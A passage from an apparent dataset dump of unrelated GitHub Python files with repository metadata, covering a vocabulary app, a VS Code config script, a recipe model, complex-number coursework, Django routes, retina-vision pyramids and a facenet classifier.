-> list[str]:\n word = word.lower().strip()\n url = settings.SYNONYMS_SEARCH_URL.format(word=word)\n\n resp = await _get_json(url)\n\n try:\n words = list(list(resp.values())[0].values())[0].keys()\n\n words = [\n i.replace('_X', ' sth/sb').replace('_', ' ')\n for i in words\n ]\n except Exception:\n return []\n else:\n return words\n\n\nasync def get_words_to_learn(*,\n limit: Optional[int] = None,\n offset: Optional[int] = None) -> list[RowMapping]:\n stmt = sa.select(models.WordToLearn)\\\n .order_by(models.WordToLearn.c.added_at)\\\n .limit(limit).offset(offset)\n\n async with database.session() as ses:\n return (await ses.execute(stmt)).mappings().all()\n\n\nasync def delete_word_to_learn(*,\n word_id: UUID) -> Optional[RowMapping]:\n stmt = sa.delete(models.WordToLearn)\\\n .returning(models.WordToLearn)\\\n .where(models.WordToLearn.c.word_id == str(word_id))\n\n async with database.session() as ses:\n return (await ses.execute(stmt)).mappings().one_or_none()\n\n\nasync def add_word_to_learn(*,\n word: str) -> None:\n stmt = models.WordToLearn.insert()\\\n .values(word=word)\n\n async with database.session() as ses:\n await ses.execute(stmt)\n","repo_name":"kunansy/Vocabulary","sub_path":"vocabulary/words/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"2760123267","text":"#!/usr/bin/python3.6\n\nimport sys\nimport getopt\nimport json\n\nwsroot='${workspaceRoot}/'\n\ndef Usage():\n\tprint (\"\"\"\\\n-j filename\n\tproperty file\n-s filename\n\tfile with sources to add\n-i filename\n\tfile with includes to add\n-c\n\tclear the file before\n-e\n\texit after clear the file (use: '-e 1')\\\n\"\"\")\n\texit(0)\n\ndef writeConfig():\n\twith open(PROP_FILE, 'w') as f:\n\t\tjson.dump(prop, f, indent=4)\n\nif len(sys.argv) < 5:\n\tUsage()\n\nPROP_FILE = incFile = srcFile = \"\"\nclrflg = exitfl = 0\nopts, args = getopt.getopt(sys.argv[1:], 'hce:j:s:i:')\nfor opt, arg in opts:\n\tif opt == '-j':\n\t\tPROP_FILE = arg\n\telif opt == '-s':\n\t\tsrcFile = arg\n\telif opt == '-i':\n\t\tincFile = arg\n\telif opt == '-c':\n\t\tclrflg=1\n\telif opt == '-e':\n\t\texitfl=1\n\telse:\n\t\tUsage()\t\t\n\nprop = json.load( open(PROP_FILE) )\n\nincludes = prop[\"configurations\"][0][\"includePath\"]\nsources = prop[\"configurations\"][0][\"browse\"][\"path\"]\n\nif clrflg == 1:\n\tincludes.clear()\n\tsources.clear()\n\tif exitfl == 1:\n\t\twriteConfig()\n\t\texit(0)\n\nnew_sources = [ line.rstrip('\\n') for line in open(srcFile,'r') ]\nnew_includes = [ line.rstrip('\\n') for line in open(incFile,'r') ]\n\nfor ni in new_includes:\n\tni = wsroot + '*' if ni == '.' else wsroot + ni + '/*'\n\tif ni not in includes:\n\t\tincludes.append(ni)\n\nfor ns in new_sources:\n\tns = wsroot + '*' if ns == '.' else wsroot + ns + '/*'\n\tif ns not in sources:\n\t\tsources.append(ns)\n\nwriteConfig()\n\n","repo_name":"perminovr/make-prj","sub_path":"Build/insert.py","file_name":"insert.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39517883818","text":"from google.appengine.ext import ndb\nfrom google.appengine.api import search\n\nclass Recipes(ndb.Model):\n user = ndb.KeyProperty(kind='Users')\n parsed = ndb.BooleanProperty(required=True)\n source_url = ndb.StringProperty()\n title = ndb.StringProperty(required=True)\n cuisine = ndb.StringProperty()\n difficulty = ndb.StringProperty(choices =['Easy', 'Medium', 'Hard'])\n prep_time = ndb.IntegerProperty(default=0)\n cook_time = ndb.IntegerProperty(default=0)\n ingredients = ndb.JsonProperty()\n directions = ndb.TextProperty(repeated=True)\n photo_key = ndb.BlobKeyProperty()\n photo_url = ndb.StringProperty()\n\n @classmethod\n def parse_ingredients(cls, string_of_ingredients):\n list_ingredients = string_of_ingredients.split('\\n')\n json_ingredients = []\n\n for row in list_ingredients:\n amount, unit, ingredient = row.split(' ')\n json_ingredients.append({\n 'amount': amount,\n 'unit': unit,\n 'ingredient': ingredient\n })\n return json_ingredients\n @classmethod\n def parse_directions(cls, string_of_directions):\n list_directions = string_of_directions.split('\\n')\n return list_directions\n\n @classmethod\n def add_new_recipe(cls, title, cuisine, difficulty, prep_time, cook_time, ingredients, directions, photo_key, photo_url, user_key=None, source_url=None):\n\n json_ingredients = cls.parse_ingredients(ingredients)\n list_directions = cls.parse_directions(directions)\n parsed = True\n user_id = ''\n\n if user_key:\n parsed = False\n user_id = str(user_key.id())\n recipe_key = cls(\n user=user_key,\n parsed=parsed,\n source_url=source_url,\n title=title,\n cuisine=cuisine,\n difficulty=difficulty,\n prep_time=int(prep_time),\n cook_time=int(cook_time),\n ingredients=json_ingredients,\n directions=list_directions,\n photo_key=photo_key,\n photo_url=photo_url\n ).put()\n\n index = search.Index('recipes')\n doc = search.Document(\n doc_id=str(recipe_key.id()),\n fields=[\n search.TextField(name='user_id', value=user_id),\n search.AtomField(name='parsed', value='1' if parsed else '0'),\n search.TextField(name='title', value=title),\n search.TextField(name='cuisine', value=cuisine),\n search.TextField(name='difficulty', value=difficulty),\n search.NumberField(name='prep_time', value=int(prep_time)),\n search.NumberField(name='cook_time', value=int(cook_time)),\n search.TextField(name='ingredients', value=ingredients),\n search.TextField(name='directions', value=directions),\n search.TextField(name='photo_url', value=photo_url),\n ]\n )\n index.put(doc)\n\n @classmethod\n def get_all_recipes_by_user(cls, user_id):\n index = search.Index('recipes')\n query = 'user_id:(%s)' % (user_id)\n results = index.search(query)\n\n return results.results\n\n\n\n\n\n\n","repo_name":"toddka/Recipe-Search-Website","sub_path":"models/recipes.py","file_name":"recipes.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"11476933769","text":"class Complex:\n '''\n >>> a=Complex(5,-6)\n >>> b=Complex(2,14)\n >>> a*b\n 94 + 58i\n >>> b*5\n 10 + 70i\n >>> 5*b\n 10 + 70i\n >>> isinstance(5*b, Complex)\n True\n >>> a.conjugate()\n 5 + 6i\n >>> b.conjugate()\n 2 - 14i\n '''\n def __init__(self,r,i):\n self._real = r\n self._imag = i\n def __str__(self):\n \"\"\"Display complex number\"\"\"\n if self._imag>=0:\n return f\"{self._real} + {self._imag}i\"\n else:\n return f\"{self._real} - {abs(self._imag)}i\"\n\n __repr__ = __str__\n def conjugate(self):\n return Complex(self._real,-self._imag)\n def __mul__(self,other):\n if(isinstance(other,Complex)):\n real = self._real * other._real - self._imag * other._imag\n imag = self._real*other._imag + other._real * self._imag\n else:\n real = other * self._real\n imag = other * self._imag\n return Complex(real,imag)\n def __rmul__(self,other):\n \"\"\"Multiply a real and Complex number\"\"\"\n if(isinstance(self,Complex)):\n real = other * self._real\n imag = other * self._imag\n elif(isinstance(other,Complex)):\n real = self * other._real\n imag = self * other._imag\n return Complex(real,imag)\nclass Real(Complex):\n\n ''' Returns True if other is a Real object that has the same value or if other is\n a Complex object with _imag=0 and same value for _real, False otherwise\n >>> Real(4) == Real(4)\n True\n >>> Real(4) == Real(4.0)\n True\n >>> Real(5) == Complex(5, 0)\n True\n >>> Real(5) == Complex(5, 12)\n False\n >>> Real(5) == 5.5\n False\n '''\n def __init__(self, value):\n super().__init__(value, 0)\n\n def __mul__(self,other):\n if(isinstance(other,Real)):\n return Real(self._real*other._real)\n elif(isinstance(other,int)):\n return Real(other*self._real)\n elif(isinstance(other,float)):\n return Real(other*self._real)\n elif(isinstance(other,Complex)):\n real = self._real * other._real - self._imag * other._imag\n imag = self._real*other._imag + other._real * self._imag\n return Complex(real,imag)\n def __rmul__(self,other):\n if(isinstance(other,Real)):\n return Real(self._real*other._real)\n elif(isinstance(other,int)):\n return Real(other*self._real)\n elif(isinstance(other,float)):\n return Real(other*self._real)\n elif(isinstance(other,Complex)):\n real = self._real * other._real - self._imag * other._imag\n imag = self._real*other._imag + other._real * self._imag\n return Complex(real,imag)\n \n def __eq__(self, other):\n\n ''' Returns True if other is a Real object that has the same value or if other is\n a Complex object with _imag=0 and same value for _real, False otherwise\n\n >>> Real(4) == Real(4)\n True\n >>> Real(4) == Real(4.0)\n True\n >>> Real(5) == Complex(5, 0)\n True\n >>> Real(5) == Complex(5, 12)\n False\n >>> Real(5) == 5.5\n False\n '''\n # YOUR CODE STARTS HERE\n isEq = False\n if isinstance(self,Real) and isinstance(other,Real):\n if(self._real == other._real):\n isEq = True\n elif isinstance(self,Real) and isinstance(other,Complex):\n if(self._real == other._real and other._imag == 0):\n isEq = True\n return isEq\n def __int__(self):\n return int(self._real)\n def __float__(self):\n return float(self._real)\nif __name__ == \"__main__\":\n import doctest\n doctest.run_docstring_examples(Real, globals(), name='Rec4',verbose=True) # Uncomment this line if you want to run doctest by function. Replace get_words with the name of the function you want to run\n #doctest.testmod() # Uncomment this line if you want to run the docstring in all functions\n\n","repo_name":"adesai1033/CMPSC132","sub_path":"RECITATION/Rec4.py","file_name":"Rec4.py","file_ext":"py","file_size_in_byte":4163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28507980224","text":"# EU\n'''sexo = 'M' or 'F'\nwhile sexo == 'M' and 'F':\n sexo += str(input('Informe o sexo do bebê [M/F] ')).upper()\n print('')\n if sexo != 'M' or 'F':\n print('Valor informado inválido! \\n Digite novamente')\nprint('Acabou')'''\n\n# GUANABARA\nsexo = str(input('Por favor. Informe seu sexo: [M/F]')).strip().upper()[0]\nwhile sexo not in 'MmFf':\n sexo = str(input('Valor inválido! Digite novamente: '))\nprint('Sexo {} registrado com sucesso.'.format(sexo))\n","repo_name":"TurSilv4/exercicioscursoemvideo","sub_path":"ex057.py","file_name":"ex057.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1894344003","text":"from django.urls import path\n\nfrom . import views\n\napp_name = \"users\"\nurlpatterns = [ \n path(\"kyc_count/\", view=views.KycCount.as_view(), name=\"kyc_count\"),\n path(\"kyc_list/\", view=views.KycList.as_view(), name=\"kyc_list\"),\n path(\"kyc_status/\", view=views.UserKycStatus.as_view(), name=\"kyc_status\"),\n path(\"notification_list/\", view=views.NotificationList.as_view(), name=\"notification_list\"),\n path(\"signup_terms_list/\", view=views.Signup_terms_list.as_view(), name=\"signup_terms_list\"), \n path(\"user_list/\", view=views.UserList.as_view(), name=\"user_list\"),\n path(\"/notification/\", view=views.UserNotification.as_view(), name=\"notification\"),\n path(\"/password/\", view=views.ChangePassword.as_view(), name=\"password\"),\n path(\"/kyc/\", view=views.UserKyc.as_view(), name=\"kyc\"), \n path(\"/mobile_number/\", view=views.MobileVerification.as_view(), name=\"mobile_number\"),\n path(\"/profile/\", view=views.UserProfile.as_view(), name=\"profile\"),\n path(\"/invitee/\", view=views.UserInviteeList.as_view(), name=\"invitee\"),\n path(\"/invitation/\", view=views.UserInvitation.as_view(), name=\"invitation\"),\n path(\"/referral_bonus/\", view=views.UserReferralBonus.as_view(), name=\"referral_bonus\"),\n path(\"/usertype/\", view=views.UserType.as_view(), name=\"usertype\"),\n path(\"/tempstring/\", view=views.TempString.as_view(), name=\"tempstring\"),\n]","repo_name":"doramong0926/coinfactory_ico","sub_path":"bluecots_ico/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71206409319","text":"def solution(n):\n direction = [(0,1),(1,0),(0,-1),(-1,0)]\n def blue_checker(i,j):\n queue = [(i,j)]\n while queue:\n i,j = queue.pop(0)\n for d in range(4):\n x = i+direction[d][0]\n y = j+direction[d][1]\n if 0<=x tfvar {source}\n \n # locate values from {terraform/*.tfvars, data sources}\n values = {}\n values[path.basename(backend_config)] = parse_tfvars(backend_config)\n values[path.basename(ami_config)] = parse_tfvars(ami_config)\n values[path.basename(bastion_config)] = parse_tfvars(bastion_config)\n values[path.basename(allowed_networks)] = parse_tfvars(allowed_networks)\n for name, source in vars.items():\n if source.startswith('dynamodb['): # DynamoDB item scan: `dynamodb[][]`\n var_opts.append('-var')\n var_opts.append(f'{name}={dynamodb.get_items(source, workspace, DEFAULT_REGION)}')\n elif source in values: # Individual bindings\n var_opts.append('-var')\n if isinstance(values[source][name], list):\n var_opts.append(f'{name}={json.dumps(values[source][name])}')\n else:\n var_opts.append(f'{name}={values[source][name]}')\n else: # Other global variables should be single value for file bindings\n var_opts.append('-var-file')\n var_opts.append(path.join(varfile_dir, source))\n return var_opts\n","repo_name":"cicdenv/cicdenv","sub_path":"lib/cicdctl/utils/terraform/component.py","file_name":"component.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"18"} +{"seq_id":"38652731398","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 6 16:20:09 2018\n\nRetina Pyramids\n@author: Piotr Ozimek\n\"\"\"\nfrom os.path import join\nfrom retinavision.retina import Retina\nfrom retinavision import datadir, utils\nimport cv2\nimport numpy as np\n\n\"\"\"\n03.02.2019 refactor plan\n- Pyramid class:\n - validation function\n - separate DoG class that simplifies creating DoGs\nExtensions:\n - extrema detection \n - ->corners\n\n- robustness to different pyramidss\n- so, uh, was/is objectify() needed?\n- parameter investigations \n sumitha's: lambda 1:L0, 1.7...:L123 (?)\n 'cortical color constancy model' params (lambda = 4)\n- validate on GPU\n\"\"\"\n\nclass Pyramid: \n #TODO: convert Coefficients into numpy object arrays! (?)\n def __init__(self, tess=0, coeffs=0, N=0, R=0):\n self.tessellations = tess\n self.coefficients = coeffs\n self.norm_maps = N\n self.retina = R\n self.PV = 0\n \n #TODO: descriptive vars\n self.levels = len(tess) if type(tess) == list else 0\n self.sigma_factor = 0\n self.rf_fov = 0\n \n \"\"\"Load pickled *array of tessellations* \"\"\"\n def loadTess(self, path):\n self.tessellations = utils.loadPickle(path)\n self.levels = len(self.tessellations)\n \n \"\"\"Load pickled *array of coefficient arrays* \"\"\" \n def loadCoeffs(self, path):\n self.coefficients = utils.loadPickle(path)\n #validate\n \n def loadNormMaps(self, path):\n self.norm_maps = utils.loadPickle(path)\n \n def setRetina(self, R):\n self.retina = R\n R.validate()\n \n def info(self):\n print(\"Tessellations, coefficients and normalization maps are all\\n\\\n stored as arrays of np.arrays. Starting from Level 0 (retina)\\n\\\n for the tessellations and from L01 for the coefficients and \\n\\\n norm_maps variables. This means that the retinal coefficients\\n\\\n and the retina normalization image are only stored inside the\\n\\\n retina variable.\")\n \n \"\"\"Core sampling/pyramidizing function\"\"\"\n def sample(self, V0): \n PV = np.ndarray(self.levels, dtype='object')\n PV[0] = V0\n \n for level in range(1,self.levels):\n C = self.coefficients[level-1]\n #nans signify a node that is outside of the image frame\n nans = np.where(np.isnan(PV[level-1]))\n V = np.zeros(len(C))\n for node in range(len(C)):\n #Omit nans or they'll spill into image centre\n not_nan = np.where(np.logical_not(np.isin(C[node][0],nans)))\n coeff_i = C[node][0][not_nan]\n coeffs = C[node][1][not_nan]\n \n V[node] = np.sum(PV[level-1][coeff_i] * coeffs)\n PV[level] = V\n \n self.PV = PV\n return PV\n \n def backproject_last(self, n=True):\n out = self.backproject(self.PV, self.retina._imsize, self.retina._fixation, n)\n return out \n \n def backproject(self, PV, shape, fixation, n=True):\n R = self.retina #TODO cleanup variable namespace\n BV = []\n BV.append(PV[0])\n for i in [1,2,3]: \n V_stream = [PV[i]]\n for j in range(i,0,-1):\n V = V_stream[i-j]\n C = self.coefficients[j-1]\n V0 = np.zeros(len(PV[j-1]))\n \n for rf in range(len(V)):\n V0[C[rf][0]] += V[rf] * C[rf][1]\n V_stream.append(V0)\n BV.append(V_stream[-1])\n \n #from the top\n BI = []\n for i, v in enumerate(BV[::-1]):\n if i == len(BV[::-1])-1: \n BI.append(R.backproject_tight(v, R._imsize, R._fixation, normalize=n)) ###TODO: correct?\n else:\n BI.append(R.backproject_tight(v, R._imsize, R._fixation, normalize=n, norm=self.norm_maps[i]))\n return BI\n \n def visualize(self, BI, title, dog=False): #redundant since GPU\n print(title + \" (below)\")\n for i in range(len(BI[:-1])): #:-1 skips the retinal level\n if dog: \n utils.picshow(np.true_divide(BI[i], self.norm_maps[i]))\n else: \n utils.picshow(np.uint8(np.true_divide(BI[i], self.norm_maps[i])))\n print(title + \" (above)\")\n\n\n\"\"\"Functions kept for posterity\"\"\"\nclass PyramidBuilder:\n def __init__(self):\n self.a = 0\n \n def generateTessellations50k(self): \n pyr_path=join(datadir,\"pyramid\")\n #Load tessellations levels\n levels = ['50k_truetess.pkl', 'tess12k5.pkl', 'tess3125.pkl', 'tess781.pkl']\n \n L0 = utils.loadPickle(join(pyr_path, levels[0]))\n L1 = utils.loadPickle(join(pyr_path, levels[1]))\n L2 = utils.loadPickle(join(pyr_path, levels[2]))\n L3 = utils.loadPickle(join(pyr_path, levels[3]))\n \n #Multiply up coarser tessellations to make them same scale as tess50k\n d5 = 0.0021888014007064422 #fov_dist_5 from the raw 50k node tess\n mean_rf = 1 #target fov_dist_5\n \n L1 *= mean_rf/d5\n L2 *= mean_rf/d5\n L3 *= mean_rf/d5\n L = [L0, L1, L2, L3]\n \n #Sumitha's approach is to use lambda as k_width\n #lambda1 = 1.7321 #sumitha's lambda, w/ retina layer = 1\n #lambda2 = 1.6 * lambda1 #wider rfs\n #lambdaB = 0.5 * lambda1 #possibly 'your' lambda, w/ retinal layer = 0.5\n #rffov = 2.4 #k_ratio\n \n #P = Gpyramid_build(L, lambda1, rffov) #narrow\n #N = Gpyramid_norm(P, R)\n #utils.writePickle(join(pyr_path, \"50K_pyr_narrow_coeffs.pkl\"), P[\"Coefficients\"])\n #utils.writePickle(join(pyr_path, \"50K_pyr_narrow_normmaps.pkl\"), N)\n #utils.writePickle(join(pyr_path,\"50K_pyr_narrow_tessellations.pkl\"), L)\n \n #P2 = Gpyramid_build(L, lambda2, rffov) #wide\n #N2 = Gpyramid_norm(P2, R)\n #utils.writePickle(join(pyr_path, \"50K_pyr_wide_coeffs.pkl\"), P2[\"Coefficients\"])\n ##utils.writePickle(join(pyr_path, \"50K_pyr_wide_normmaps.pkl\"), N2)\n #utils.writePickle(join(pyr_path,\"50K_pyr_wide_tessellations.pkl\"), /\n #P2[\"Tessellations\"])\n \n return L\n\n \"\"\"\n Params:\n L1 - a single, appropriately scaled tessellation (x,y) array. \n L2 - a single, appropriately scaled tessellation that is a pyramid level\n higher than L1\n sigma_factor - (lambda) sigma scaling factor\n rf_fov - the field of view of each receptive field, defined as a factor of\n sigma\n \n Returns:\n Gaussian pyramid coefficients between successive levels L2 and L1.\"\"\"\n def Gpyramid_coeffs(self, L0, L1, sigma_factor, rf_fov):\n L1_coeff = np.ndarray((len(L1)),dtype='object')\n \n #cdist\n DIST10 = utils.cdist_torch(L0, L1).numpy() #distances between two levels\n DIST1 = utils.cdist_torch(L1, L1).numpy() #distances within L1\n \n dist_5 = np.mean(np.sort(DIST1)[:,1:6], axis=1)\n fov = rf_fov * dist_5 #TODO: dist5 * lambda for sumitha, * kratio (2.4) for u\n \n #L1_r = norm(L1, axis=1)\n L1_sigma = sigma_factor*dist_5\n \n for i in range(len(L1)):\n rf = np.where(DIST10[i] <= fov[i])[0]\n \n coeffs = (rf, utils.d_gauss(L1_sigma[i], DIST10[i,rf]))\n L1_coeff[i] = coeffs\n \n return L1_coeff\n\n \"\"\"\n Params:\n L - a list or an array of pyramid tessellations, in order L0...Ln\n sigma_factor - (lambda) Gaussian rf pyramid scaling factor\n rf_fov - the field of view of each receptive field, defined as a factor of\n sigma\n \n Returns:\n Pyramid class, eventually. For now a dict.\n Pyramid - {Tessellations:[L0...Ln], Coefficients:[L1... Ln]}\n L1 Coefficients: [N x tuple([L0 indices], [coeffs]) ]\n where N = len(L1 tessellation)\n \n NOTES:\n Include base retinal parameters?\"\"\"\n def Gpyramid_build(self, L, sigma_factor, rf_fov):\n P = {}\n P['Tessellations'] = L\n P['Coefficients'] = []\n \n for level in range(1,len(L)):\n c = self.Gpyramid_coeffs(L[level-1], L[level], sigma_factor, rf_fov)\n P['Coefficients'].append(c)\n \n return P\n\n \"\"\"Produce normalization maps for each level of the pyramid\"\"\" \n def Gpyramid_norm(self, tess, coeffs, R):\n PV_norm = []\n for i in [1,2,3]:\n #Project unmodulated coefficients down a level (unit imagevector)\n V_stream = [np.ones(len(tess[i]))]\n \n #Down-propagate the projection to the retina\n for j in range(i,0,-1):\n Av = np.zeros(len(tess[j-1]))\n C = coeffs[j-1]\n for rf in range(len(tess[j])):\n Av[C[rf][0]] += C[rf][1] * V_stream[-1][rf]\n V_stream.append(Av)\n \n #Back-project an image\n GI = np.zeros((R.width, R.width))\n r = R.width/2.0\n V = V_stream[-1]\n for i in range(R.N - 1, -1, -1): \n GI = utils.project(V[i] * R.coeff[0,i], GI, R.loc[i,:2][::-1] + r)\n \n norm = np.zeros((R.width, R.width))\n norm = utils.project(GI, norm, (R.width//2, R.width//2))\n PV_norm.insert(0, norm)\n \n return PV_norm\n\n\n##Load retina, take a pic and sample\n#R = Retina(gpu=False)\n#R.loadLoc(join(datadir, \"retinas\", \"ret50k_loc.pkl\"))\n#R.loadCoeff(join(datadir, \"retinas\", \"ret50k_coeff.pkl\"))\n#\n##impath = \"D:\\\\RETINA\\\\images\\\\Harmony_of_Dragons.jpg\"\n##impath = \"D:\\\\RETINA\\\\images\\\\TEST.png\"\n#impath = \"D:\\\\RETINA\\\\images\\\\original.png\"\n#img = np.float64(cv2.imread(impath, 0))\n#x = img.shape[1]/2\n#y = img.shape[0]/2\n#fixation = (y,x)\n#\n#R.prepare(img.shape, fixation)\n#V = R.sample(img, fixation)\n#backproj = np.true_divide(R.backproject_last(n=False),R._gaussNorm)\n#utils.picshow(np.uint8(backproj), size=(10,10))\n#\n###\n##PB = PyramidBuilder()\n##pyr_path = join(datadir,\"pyramid\")\n##L = utils.loadPickle(join(pyr_path, \"50K_pyr_narrow_tessellations.pkl\"))\n##lambda1 = 1.7321 #sumitha's lambda, w/ retina layer = 1\n##lambda2 = 1.6 * lambda1 #wider rfs\n##rffov = 2.4 #k_ratio\n##\n##P = PB.Gpyramid_build(L, lambda1, rffov) #narrow\n##N = PB.Gpyramid_norm(P, R)\n##utils.writePickle(join(pyr_path, \"50K_pyr_narrow_coeffs.pkl\"), P[\"Coefficients\"])\n##utils.writePickle(join(pyr_path, \"50K_pyr_narrow_normmaps.pkl\"), N)\n##utils.writePickle(join(pyr_path,\"50K_pyr_narrow_tessellations.pkl\"), L)\n##\n##P2 = PB.Gpyramid_build(L, lambda2, rffov) #wide\n##N2 = PB.Gpyramid_norm(P2, R)\n##utils.writePickle(join(pyr_path, \"50K_pyr_wide_coeffs.pkl\"), P2[\"Coefficients\"])\n###utils.writePickle(join(pyr_path, \"50K_pyr_wide_normmaps.pkl\"), N2)\n##utils.writePickle(join(pyr_path,\"50K_pyr_wide_tessellations.pkl\"), P2[\"Tessellations\"])\n#\n#\n#######\n## \n##pyr_path = join(datadir,\"pyramid\")\n##L = utils.loadPickle(join(pyr_path, \"50K_pyr_narrow_tessellations.pkl\"))\n##C = utils.loadPickle(join(pyr_path, \"50K_pyr_narrow_coeffs.pkl\"))\n##L2 = utils.loadPickle(join(pyr_path, \"50K_pyr_wide_tessellations.pkl\"))\n##C2 = utils.loadPickle(join(pyr_path, \"50K_pyr_wide_coeffs.pkl\"))\n##\n##PB = PyramidBuilder()\n##N = PB.Gpyramid_norm(L, C, R)\n##N2 = PB.Gpyramid_norm(L2, C2, R)\n##\n###\n##\n##utils.writePickle(join(pyr_path, \"50K_pyr_narrow_normmaps.pkl\"), N)\n##utils.writePickle(join(pyr_path, \"50K_pyr_wide_normmaps.pkl\"), N2)\n#\n#######\n##'applied constant blurring in each layer = 1.7321 * initial blurring\n##which gives 1.7321 * graph edge, or mean_dist_5. That's used to compute diameter\n##of cortical support as well as gaussian sigma. In the retinal layer he maintains\n##the value at 1, whereas your retina seems best with the value at 0.5 \n##(lambda, or sigma_base). If his lambda fails, try 0.5 * 1.7321.\n#\"\"\"\n#A good test for the pyramid is the spatial frequency human vision test. \n#File test2.jpg in images - construct an image like that for your test, sample \n#with pyramid/retina for good evaluations and include in paper.\n#\"\"\"\n#\n##Testing object model\n#\n##Files\n#pyr_path = join(datadir,\"pyramid\")\n#L = utils.loadPickle(join(pyr_path, \"50K_pyr_narrow_tessellations.pkl\"))\n#L2 = utils.loadPickle(join(pyr_path, \"50K_pyr_wide_tessellations.pkl\"))\n#N = utils.loadPickle(join(pyr_path, \"50K_pyr_narrow_normmaps.pkl\"))\n#N2 = utils.loadPickle(join(pyr_path, \"50K_pyr_wide_normmaps.pkl\"))\n#C = utils.loadPickle(join(pyr_path, \"50K_pyr_narrow_coeffs.pkl\"))\n#C2 = utils.loadPickle(join(pyr_path, \"50K_pyr_wide_coeffs.pkl\"))\n#\n##init\n#narrow = Pyramid(tess = L, coeffs = C, N=N, R=R)\n#wide = Pyramid(tess = L2, coeffs = C2, N=N2, R=R)\n#\n##process\n#narrow_PV = narrow.sample(V)\n#wide_PV = wide.sample(V)\n#laplace = wide_PV - narrow_PV\n#\n##backproject\n##narrow_vis = narrow.backproject_last()\n##wide_vis = wide.backproject_last()\n#laplace_vis = narrow.backproject(laplace, R._imsize, fixation, n=False)\n#\n##visualize\n##narrow.visualize(narrow_vis, \"Narrow Gaussian Pyramid\")\n##wide.visualize(wide_vis, \"Wide Gaussian Pyramid\")\n##narrow.visualize(laplace_vis, \"Laplacian Gaussian Pyramid\", log=True)\n##for im in narrow_vis:\n## utils.picshow(im)\n##\n##for im in wide_vis:\n## utils.picshow(im)\n#\n#for im in laplace_vis:\n# utils.picshow(im)\n# \n# \n#narrow.visualize(laplace_vis, \"DoG\", dog=False)\n","repo_name":"Pozimek/RetinaVision","sub_path":"retinavision/pyramid.py","file_name":"pyramid.py","file_ext":"py","file_size_in_byte":13460,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"12729112623","text":"#!/usr/bin/env python\n# D. Jones - 2/13/14\n\nimport numpy as np\n\ndef rebin(a, new_shape):\n\n M, N = a.shape\n m, n = new_shape\n if m= 0.90)[0][0]\n cutoff_length = sorted_lengths[cutoff_index][0]\n\n truncated_data = {k: v for k, v in length_counts.items() if k <= 800}\n\n fig, ax = plt.subplots(figsize=(12, 6))\n ax.bar(truncated_data.keys(), truncated_data.values())\n ax.set_xlabel('Text Length')\n ax.set_ylabel('Count')\n ax.set_title('Text Length Distribution')\n\n # Add 90% cumulative line\n ax.axvline(cutoff_length, color='r', linestyle='--', label=f'90% cumulative ({cutoff_length})')\n ax.legend()\n\n plt.show()\n\n\ndef main():\n files = [filename for filename in os.listdir('.') if filename.endswith('.jsonl')]\n result = count_text_length(files)\n\n for length, count in sorted(result.items(), key=lambda x: x[0]):\n print(f\"Length: {length}, Count: {count}\")\n\n # Plot histogram\n plot_histogram(result)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"shibing624/text2vec","sub_path":"examples/data/count_text_length.py","file_name":"count_text_length.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":3412,"dataset":"github-code","pt":"19"} +{"seq_id":"24313183473","text":"import Facenet.classifier as classifier\nimport CompVision\nfrom Facenet.Align import align_dataset_mtcnn\nimport os\nfrom DataProcessing import Saver\n\nPATH = os.getcwd()\n\n\ndef train_model(batch_size):\n print('Model Train Started')\n classifier.run('TRAIN', batch_size=batch_size)\n print('Model Training Finished')\n\n\ndef align_faces(image_size=160, margin=32, gpu_memory_fraction=0.1, detect_multi_face=False):\n print('Face Alignment Started')\n align_dataset_mtcnn.run(image_size=image_size, margin=margin, gpu_memory_allocation=gpu_memory_fraction,\n multi_face=detect_multi_face)\n print('Face Alignment Complete')\n print('Blur Started')\n blur_photos()\n print('Blur Completed')\n\n\ndef classify_photo():\n CompVision.take_a_photo()\n name = classifier.run()[0].upper()\n original_path = PATH + '/Predict/CLASS1/Predict.png'\n\n if not name == 'UNKNOWN':\n decision = str(input('Was Prediction Correct? [y/n]: ')).upper()\n if decision == 'Y':\n num_photos = Saver.get_num_photos(name)\n os.rename(original_path, PATH + '/People/Raw/{}/{}-{}.png'.format(name, name, num_photos))\n print('file renamed')\n else:\n os.rename(original_path, PATH + '/Predict/CLASS1/UNKNOWN.png')\n else:\n print('file named unknown')\n os.rename(original_path, PATH + '/Predict/CLASS1/UNKNOWN.png')\n\n\ndef classify_many_photos():\n folder = 'People/Random/Class/'\n class_list = classifier.run(_data_dir='People/Random')\n folder_list = os.listdir(folder)\n index = int()\n\n for name in class_list:\n old_pic = PATH + '/' + folder + folder_list[index]\n new_pic = PATH + '/' + folder + name + '-' + str(index)\n os.rename(old_pic, new_pic)\n index = index + 1\n\n folder_list = os.listdir(folder)\n for pic in folder_list:\n name = pic[:-2]\n if not name == 'UNKNOWN':\n num_photos = Saver.get_num_photos(name)\n if num_photos == 0:\n temp_name = name[:-1]\n if Saver.get_num_photos(temp_name) > 0:\n name = temp_name\n else:\n continue\n new_name = '{}-{}.png'.format(name, num_photos)\n old_dir = folder + pic\n new_dir = 'People/Raw/{}/{}'.format(name, new_name)\n os.rename(old_dir, new_dir)\n\n\ndef blur_photos():\n\n directory = PATH + '/People/Aligned/'\n people_names = os.listdir(directory)\n\n for name in people_names:\n person_dir = directory + str(name) + '/'\n\n try:\n for 